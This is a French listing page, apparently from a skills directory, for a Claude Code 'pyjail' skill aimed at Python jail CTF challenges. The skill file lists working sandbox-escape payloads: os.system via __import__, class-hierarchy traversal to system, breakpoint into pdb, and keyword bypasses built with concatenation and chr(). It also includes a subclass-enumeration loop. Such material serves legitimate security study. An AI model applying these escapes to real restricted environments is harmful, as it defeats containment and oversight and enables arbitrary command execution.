Évasion de prison Python

VérifiéPrudence

Techniques pour contourner les restrictions de sandbox Python et exécuter du code arbitraire dans des environnements restreints.

Spar Skills Guide Bot
SecuriteIntermédiaire
1027/07/2026
Claude Code
#python#jail-escape#sandbox#security#pentesting

Recommandé pour

Notre avis

Aide à contourner les restrictions des environnements Python sandboxés dans les contextes eval/exec filtrés ou les challenges de jail.

Points forts

  • Propose plusieurs techniques de contournement (builtins, hiérarchie de classes, encodage).
  • Fournit une commande de débogage rapide pour trouver l'index des classes utiles.
  • Accompagné de fichiers de référence détaillés pour les contournements et les payloads.

Limites

  • Certaines techniques dépendent de la version de Python (ex. breakpoint nécessite Python 3.7+).
  • Ne couvre pas tous les types de filtres possibles (ex. AST, bytecode).
  • Les références peuvent ne pas être à jour avec les derniers contournements.
Quand l'utiliser

Utilisez cette compétence lorsque vous devez exécuter des commandes dans un environnement Python restreint ou résoudre un défi de type Python jail.

Quand l'éviter

Ne l'utilisez pas pour du développement Python normal ou dans des environnements non restreints.

Analyse de sécurité

Prudence
Score qualité90/100

The skill equips an agent with techniques to bypass Python sandbox restrictions entirely, enabling arbitrary code execution. While intended for legitimate security research/CTF challenges, it lowers the barrier to executing powerful commands and could inadvertently cause harm if used improperly.

Points d'attention
  • Provides Python escape payloads that can execute arbitrary system commands, which could be misused for destructive actions or data exfiltration if applied outside controlled CTF/sandbox environments.

Exemples

Basic command execution via class hierarchy
I need to execute 'cat flag.txt' inside a Python jail that blocks '__import__'. Show me how to use class hierarchy to bypass.
Find useful class index
Help me find the index of a useful subclass to execute system commands in a Python jail by enumerating subclasses.
Keyword filter bypass with concatenation
The Python jail blocks the word 'os'. How can I call os.system using string concatenation or chr()?

name: pyjail description: Escapes Python sandbox restrictions. Use when working with restricted Python eval/exec environments, sandbox escapes, filtered input challenges, or Python jail challenges. allowed-tools: Bash, Read, Write, Grep, Glob

Python Jail Escape Skill

Quick Workflow

Progress:
- [ ] Identify restrictions (blocked keywords/chars)
- [ ] Try basic escapes first
- [ ] If builtins blocked, use class hierarchy
- [ ] Bypass filters with encoding/concatenation
- [ ] Execute command to get flag

Quick Reference - Common Escapes

# Basic command execution
__import__('os').system('cat flag.txt')
eval("__import__('os').system('id')")
exec("import os; os.system('ls')")

# Using breakpoint (Python 3.7+)
breakpoint()  # Drops into pdb, then !cat flag.txt

# No builtins - class hierarchy
().__class__.__base__.__subclasses__()[132].__init__.__globals__['system']('cat flag')

# Keyword bypass
__import__('o'+'s').system('cat flag')
__import__(chr(111)+chr(115)).system('cat flag')

Reference Files

| Topic | Reference | |-------|-----------| | Bypass Techniques | reference/bypass.md | | Complete Payloads | reference/payloads.md |

Quick Debugging

# Find useful class index
for i, c in enumerate(().__class__.__base__.__subclasses__()):
    if 'wrap' in str(c): print(i, c)

# Check available builtins
dir(__builtins__)
Skills similaires